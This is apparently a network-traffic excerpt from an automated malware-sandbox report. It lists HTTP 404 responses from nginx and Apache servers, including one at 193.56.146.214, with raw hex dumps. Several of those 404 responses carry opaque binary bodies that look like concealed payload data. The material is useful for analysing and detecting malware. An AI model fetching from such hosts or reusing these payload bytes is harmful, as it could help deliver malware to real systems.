4b 55 09 d4 c1 1e 2b 50 6b bd 8e c3 58 87 c6 41 c9 b0 26 1c 94 c0 99 7d 5a 99 2b 99 5b af 18 9f 7a 95 5f 97 a6 75 3e 1a 20 8c a3 b0 ca 79 f7 ad f5 31 61 a4 cf 37 1f 1a eb 3f ae c6 74 31 8c 8f f5 03 96 0b cd 96 df a5 61 6c fd 71 12 70 df ce 22 db 30 d5 a9 b6 2a 08 8f 01 e9 46 76 22 e1 ff b8 5c 3f 1f 83 d0 30 38 ba 60 bd 49 22 09 69 53 40 98 e3 94 54 e0 2f 60 43 8c 67 f0 86 f0 fb 34 6c 1b 45 6e d5 f6 4e 76 8c 9e cd 37 14 39 7e a2 55 6b 5f c7 ae 4a 88 54 d9 60 49 d3 03 e7 fe 88 2c 3b 4c f9 10 e5 ec 9a db 25 2f 45 75 04 c5 e3 a1 b7 d9 17 81 5d 26 db 3a 35 9d f7 d5 49 4f 44 e8 d0 32 79 2e 0a ba e8 33 ec fd 05 89 52 de 0e 63 bb d6 d4 46 d1 f2 38 df d5 bf 2b 02 87 d2 db 53 3d a0 c3 96 cb 7d 64 57 b4 85 5b ae 39 16 1b e2 99 15 f7 bb 2e 44 31 e2 08 5a 11 dc 40 b4 06 91 b1 41 6b 05 23 9f f5 4a b0 6e 78 0d 2a f7 d8 d2 12 74 3c 8b 08 f5 a5 36 3d 07 4e c4 b2 d6 ea ec 5b ab 10 a3 0b ab c1 39 e2 a7 66 94 c6 a6 d3 30 68 1e 11 b2 18 4c c1 58 40 f6 e7 2a 33 72 08 ac 78 ae 53 ff 0f 71 5f 75 56 4f 82 56 c3 e9 37 7f a3 29 ff f1 ee 21 bd b4 4f 07 bb 75 4b 99 01 ac 67 90 ff 21 62 11 14 74 22 d5 a5 d5 93 03 e8 a9 1c 5e 68 fc b5 2c f4 47 1c 3f 4d 93 1e 60 70 06 72 52 89 52 93 3e 09 6e c1 ca 39 52 3e cc 35 5f d8 89 98 4c 97 49 94 56 ef 01 37 e2 41 44 f0 8b 65 48 8a 76 e1 41 84 8e 71 b4 0d 16 5e ea 87 04 82 cd 7d 42 fd bd 38 ad 2a 2c 3f 86 9c aa ca b7 04 d6 62 da f5 e1 c8 09 f8 66 f4 23 a4 3b ca b5 a0 83 56 84 86 76 4e 38 13 f9 77 46 05 19 a7 ae 19 17 b0 68 d3 a1 24 4f 38 6a 19 e7 66 f5 1d 33 c7 2a 09 c5 ed fc c4 23 ef 28 ef 3e 1c 2b 48 06 30 c8 0b 4c 27 c7 7d e6 c2 6a fd 20 23 71 de a1 9f 39 b0 fc f8 06 04 cd 0b dd 30 d5 71 cf d6 a3 96 5c 41 be c0 52 50 0f fb 75 d2 7a b6 d7 5b d4 77 ed f6 4b a5 53 52 d2 c7 d4 d1 79 5e 67 ad 6d 15 b0 c0 db 31 a0 29 77 39 ac b2 03 07 1e 17 76 38 bc db 58 67 4b 5b 67 e2 3f d3 78 d9 f8 1f ba a2 50 11 3b ec 5f e0 3c 47 4b d4 50 b0 20 e1 1e 34 ee d3 2e ac 9c d8 f7 0d c0 23 af 38 15 06 1f 84 48 7f 4f 6d 5b df 92 a0 cf 0b 80 51 a9 cd 6d e1 7c 1c 9d 89 05 4d 99 2e 94 58 13 86 89 b0 6e 2c dc c3 75 44 f4 8b 85 52 aa a2 e4 2f a9 e7 5b 9a 1e bd 79
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:08 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 9d 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8b bf 6a c6 ca 05 11 fc 86 d5 36 8c f6 c7 35 f3 73 07 03 d2 ff f9 fa fa eb b2 b9 71 cd 79 33 33 d1 60 73 45 7c 1f 57 44 63 84 be 3c 50 15 51 fe 08 a2 b9 7f 18 66 7d 28 2a a7 6a dd d6 bc db 43 15 5c 53 a6 cd f6 4d 55 62 91 54 5b fd 55 19 d0 ed c5 70 b1 17 20 58 4a ed 08 63 3e 17 21 6b df a3 06 83 3a 56 2f cb 00 23 be 52 15 d7 17 53 53 fa cb 1f 9e 0d 09 52 2b e5 8d 83 7b 7e 45 f7 ff e4 e1 55 db 8b 0d 13 13 bf 9e e1 92 08 0c 4f c5 03 a1 cb a1 61 7e de f5 69 e1 19 17 c6 4c af 9a a5 e4 c9 a0 cd b9 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d c0 5d bf 46 34 fd f8 12 4c 33 6c 21 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 e3 a0 f5 1a 20 9b 4a d8 19 ae cc 4f 3b 79 82 ae b2 e3 67 34 01 56 ad f3 a3 77 2a b9 72 ce cc 23 b2 3b 0e 31 79 90 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 43 11 bb b6 81 43 4f 55 b7 69 b7 9f 1f cd cc 46 d9 c8 15 ac af ed d9 55 3d ff ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 26 e7 ac 44 06 f6 27 2c 18 f8 c7 9b 88 e7 3d 66 f1 2a 64 b1 1d 32 12 51 8c 26 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 0e a1 54 17 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 1e 54 ab 1e f6 11 11 ee c3 ce 57 a3 04 1d 85 1f d6 5c 6d 91 cc 62 06 f1 60 7f ae 03 58 e5 1d e4 a4 7d 10 99 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a 8f f6 6b e3 80 8a 49 37 03 80 e3 1c cd 20 f5 52 b7 3b 3a 96 f5 cb e7 17 3f dc e5 7e 0d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 98 3a 1d f8 4e b5 14 86 c1 70 a8 fe 04 c5 db ad 0e c9 9c 47 a2 91 29 98 f9 4c 79 de 79 d5 57 d0 6f fd ef 76 67 a8 db e9 d5 6a e2 3c 99 a8 84 be 57 a7 eb 6c 28 8e 94 16 a3 4e d4 e7 23 b2 52 dc 1a 9e 8b 18 07 64 01 7d 46 02 82 96 c6 ce 2d b2 9d df 3c 42 56 60 de 9e 93 0f 94 45 a9 24 4f 78 60 22 30 5f d6 a0 b8 78 fe b1 8e 98 37 20 5e 32 d0 c9 f3 32 42 82 39 16 12 47 0b f9 17 30 8d e3 51 22 b2 3d df 10 54 5a 17 1c 5c 5a 12 b3 19 5f 11 8f 69 f9 e4 b9 2a 01 6e f3 fd 58 b3 dc 95 25 1f 90 13 f7 5e 15 23 b5 01 92 e3 92 c2 01 7d 7e d3 95 bc 43 cf 76 62 93 55 e1 05 85 d4 9c 97 2e 60 10 3a 93 83 ac e5 fe 99 ae 32 c8 6e 95 8d 4a d5 f8 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 fb 37 67 d2 1f ad af a2 e2 54 24 d0 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 12:11:09 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 402Keep-Alive: timeout=5, max=96Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 33 2e 35 36 2e 31 34 36 2e 32 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 193.56.146.214 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 12:11:09 GMTServer: Apache/2.4.29 (Ubuntu)Keep-Alive: timeout=5, max=95Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 37 63 63 30 32 0d 0a 00 00 6e 47 17 86 3c 28 c2 36 40 7b b6 16 56 36 0c 45 49 50 b5 c5 ea fa 80 5d 3d 4d 94 01 9f 38 c5 e4 b8 b3 1b e4 69 14 ba 72 71 2e a2 b2 43 37 3a 71 f6 aa 4d af 80 0d c2 d6 60 e5 83 44 7d 49 98 ab 99 7a d3 1e 48 2e 96 0c 59 41 c8 0f 06 51 ea 33 08 e5 01 db b9 93 51 3b a1 fd f4 43 7f 32 3d 09 67 19 00 03 ae df 8e 36 20 d7 fa a7 5c ea c3 c5 0c 90 75 ff 67 5a b4 7c e9 9f 09 79 61 ab 85 ce 60 d5 d3 ef 53 47 4d c5 7c a2 52 90 b7 be 4f 41 dd 46 29 0a f9 36 87 18 bc 67 b1 2e 7c f9 3e 05 14 73 5e ef 3b f3 56 72 70 6e 1e 04 b2 50 2a 87 d6 37 83 3a fa 04 b1 07 a0 e2 19 17 80 2f ba 8e 42 0d 0a 7e 82 cf 27 11 da 9d 1d b3 9c 88 8a 38 22 7a 61 2e e6 2a 7e d7 46 ad 96 2e cb 81 88 4b 55 09 d4 c1 1e 2b 50 6b bd 8e c3 58 87 c6 41 c9 b0 26 1c 94 c0 99 7d 5a 99 2b 99 5b af 18 9f 7a bd 0c 93 a6 69 3e 1a 20 8c 63 bb ca c9 ba ad f5 31 61 a4 cf 37 1f 1a eb 3f 82 c2 74 e1 81 8f f5 03 96 07 cd 96 df a5 61 6c fd 71 12 70 df ce 22 db 30 d5 a9 b6 2a 08 8f 01 e9 46 76 22 e1 ff b8 5c 3f 1f 83 d0 30 38 ba 60 bd 49 22 09 69 53 40 98 e3 94 54 e0 2f 60 43 8c 67 f0 86 f0 fb 34 6c 1b 45 6e d5 f6 4e 76 8c 9e cd 37 14 39 7e a2 55 6b 5f c7 ae 4a 88 54 d9 60 49 d3 03 e7 fe 88 2c c7 1f fd 10 e5 ec 9a db 25 79 41 75 04 c5 e3 a1 b7 d9 17 81 5d 26 db 3a 35 9d f7 d5 49 4f 44 e8 d0 32 79 2e 0a ba e8 33 5c b0 05 89 52 1e 05 63 bb 9a d4 46 d1 a0 3c df d5 bf 2b 02 87 d2 db 53 3d a0 c3 96 cb 7d 64 57 b4 85 5b ae 39 16 1b e2 99 15 f7 bb 2e 44 3d e2 08 5a 11 dc 40 9e 02 91 b1 41 6b 05 23 9f f5 4a b0 6e 78 0d 2a f7 d8 d2 12 74 3c 8b 08 f5 a5 36 3d 07 4e c4 b2 d6 ea ec 0f f8 14 a3 0b ab c1 39 e2 a7 66 94 c6 a6 d3 30 18 65 17 b2 f4 a7 c1 58 40 f6 e7 2a 9d 72 08 ac 54 7b 52 ff eb 48 5a 75 56 4f 82 56 c3 e9 37 7f a3 29 ff f1 ee 21 bd b4 4f 07 bb 75 4b 99 01 ac 67 90 ff 21 62 11 14 74 22 d5 a5 d5 93 03 e8 a9 51 04 f8 fc b7 2c f4 47 1b 3f 4d 93 e6 9f 70 06 c5 52 89 52 8c 3e 09 6e be ca 39 52 41 cc 35 5f 27 89 98 4c 68 48 94 56 10 02 37 e2 be 43 f0 8b 9a 47 8a 76 1e 5e 84 8e 8e 8b 0d 16 21 95 87 04 73 2d c7 4c 02 f6 30 60 f4 6b 3d 82 ae 74 99 df 92 5a 4d aa 78 71 b0 7b 66 f4 eb 40 3a aa db da 2b 5c cb e1 59 fb c4 57 cc 6f e6 65 be a9 0b 89 8b 87 2b 02 02 53 d6 5a e3 95 e6 d8 99 0a e2 4c 97 6f 09 c5 e9 fd c7 23 56 3e ec ab 1c 2b 48 06 30 c8 0b 4c c7 c7 5f c6 c9 6b ad 20 23 6b de a1 9f 3f b0 fc f8 06 04 cd 51 e5 30 d5 71 ef d6 a3 96 1c 41 be c0 52 50 1f fb 55 d2 7a b6 d5 5b d4 72 ed f6 4b a5 53 52 d2 c1 d4 d1 79 5e 67 ad 6d 11 30 c0 db 31 a2 29 77 31 ac b2 03 04 1e 57 f3 28 bc cb 58 67 5b 5b 67 c2 3f c3 78 d9 e8 1f ba e2 50 11 3b fc 5f e0 3c c7 4b d4 50 b0 20 e1 1e 3c d7 d3 2e e3 9c d8 f7 0d 82 23 af 40 16 06 1f 84 4c 7f 4f 6d 5b df 92 a0 c7 0b 80 51 a9 cd 6d e1 0c 1c 9d 89 05 4d 99 20 83 58 13 87 89 b0 6e 2c 9c c3 75 44 f4 8b 85 52 2a a2 e4 2f a9 e7 5b 9a 1e bc 79
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:11 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 40 26 0b 04 59 b9 1d 6d f5 e9 e6 a1 29 7a 3a 62 c3 cc a7 43 ec 44 d7 6b 50 78 18 e0 30 8a 3c a2 61 a3 d6 d4 22 a2 58 d5 5b 2d 22 ad 88 88 5e 6f d7 9f b7 ee bc db 32 b9 9a 4c ca 4c 08 03 d4 d2 a1 97 c6 37 13 4b 42 c4 d4 5a c6 ca 23 e8 16 41 bf 6c 13 d9 c8 9f 57 db 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 56 2b 88 b6 4b 24 7e 45 f7 ff 78 8d 55 db 24 0d 11 12 b4 1f eb 92 24 82 45 c5 03 49 bd a3 61 7e de f5 69 33 11 17 7e 4f af 9a a5 e4 c3 a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f4 96 be 25 51 61 9f d4 3f 7c 88 28 c8 48 6b 11 41 48 9a 07 fd ec 23 20 77 ac 85 2f bd e0 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 d5 20 c6 4f 6b 79 82 ae 9c a7 82 4e 95 1f ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df 75 6c e5 ee 30 4c 80 f0 00 f9 13 7f 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 9a 70 f7 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 94 42 40 bb 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 39 07 bd 1b 6f d3 cb 29 32 a2 ed 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 4d 67 85 4d 5e ae 03 13 61 6a e6 a6 dd 1a 9f 10 af d9 b0 99 89 93 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 fa b0 92 48 a9 b4 bb e1 33 17 28 d2 9e c6 1d d0 eb aa 7a 8f 52 61 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a d6 63 b9 82 7b 50 bf e5 7e 75 82 71 d4 03 6b 2c 9a 76 48 0e ca 82 21 2f 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 01 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 12:11:12 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 402Keep-Alive: timeout=5, max=94Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 33 2e 35 36 2e 31 34 36 2e 32 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 193.56.146.214 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 12:11:12 GMTServer: Apache/2.4.29 (Ubuntu)Keep-Alive: timeout=5, max=93Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 33 62 39 32 30 32 0d 0a 00 00 6e 47 17 86 3c 28 c2 36 40 7b b6 16 56 36 0c 45 49 50 b5 c5 ea fa 80 5d 3d 4d 94 01 9f 38 c5 e4 b8 b3 1b e4 69 14 ba 72 71 2e a2 b2 43 37 3a 71 f6 aa 4d af 80 0d c2 d6 60 e5 83 44 7d 49 98 ab 99 7a d3 1e 48 2e 96 0c 59 41 c8 0f 06 51 ea 33 08 e5 01 db b9 93 51 3b a1 fd f4 43 7f 32 3d 09 67 19 00 03 ae df 8e 36 20 d7 fa a7 5c ea c3 c5 0c 90 75 ff 67 5a b4 7c e9 9f 09 79 61 ab 85 ce 60 d5 d3 ef 7b c0 4d c5 0c cd ac 7a b7 be 4f 41 dd 46 29 0a e9 36 a7 19 bc 64 89 2e 7c 6f 3b 05 14 41 67 ef 3b f3 56 72 3e 8f 19 04 b2 10 12 87 d6 37 cb 3a fa 04 f1 07 a0 e2 19 17 80 2f ba 8e 42 0d 0a 7e 82 cf 27 11 d8 9d 1d b3 9c 88 8a 38 22 da 52 2e e6 2c 7e d7 ff bc a2 2e cb 81 88 4b 55 09 84 c1 1e 3b 50 6b bd ce d3 58 87 d6 41 c9 b0 26 0c 94 d0 99 7d 5a 99 0b 99 5b af 18 9f 7a bd ed 94 a6 32 3e 1a 20 8c 63 b3 ca 21 bf ad f5 31 61 a4 cf 37 1f 1a eb 3f 8c ff 74 3d 9f 8e f5 03 b6 0f cd 9a df a5 61 6c fd 71 12 70 df ce 22 db 30 d5 a9 b6 2a 08 8f 01 e9 46 76 22 e1 ff b8 5c 3f 1f 83 d0 30 38 ba 60 bd 49 22 09 69 53 40 98 e3 94 54 e0 2f 60 43 8c 47 f0 86 f8 fb 34 6c 1b 45 6e d5 f6 4e 76 8c 96 ed 37 14 71 7e a2 55 6b 5f c7 ae 4a 88 54 d9 4e 5d 8e 7b db fe 88 2c 93 de fa 10 e5 cc 9a db 66 dc 31 5d 0e 88 9d 8f 93 f2 2f 81 5d 06 db 3a 35 b1 cf d5 69 4b 44 88 fe 40 0a 5c 69 ba e8 33 b4 b5 05 89 12 1e 0d 83 95 e8 b1 3e a5 64 3b df 39 ec 29 02 87 b2 e3 53 3d f4 c1 96 8b 4d 5c 17 9a f7 3e c2 56 75 1b e2 95 15 f7 bb 0e 64 35 82 26 2a 62 ae 23 54 05 91 d5 4c 6a 05 23 5f cf 4a b0 60 79 0d 6a 73 e2 90 12 74 3c 8b 08 f5 a5 36 3d 07 4e c4 f2 d6 ea ac 3f 19 13 a3 0b ab c1 39 aa a7 66 94 c4 a6 d6 30 80 10 10 b2 9c cc c1 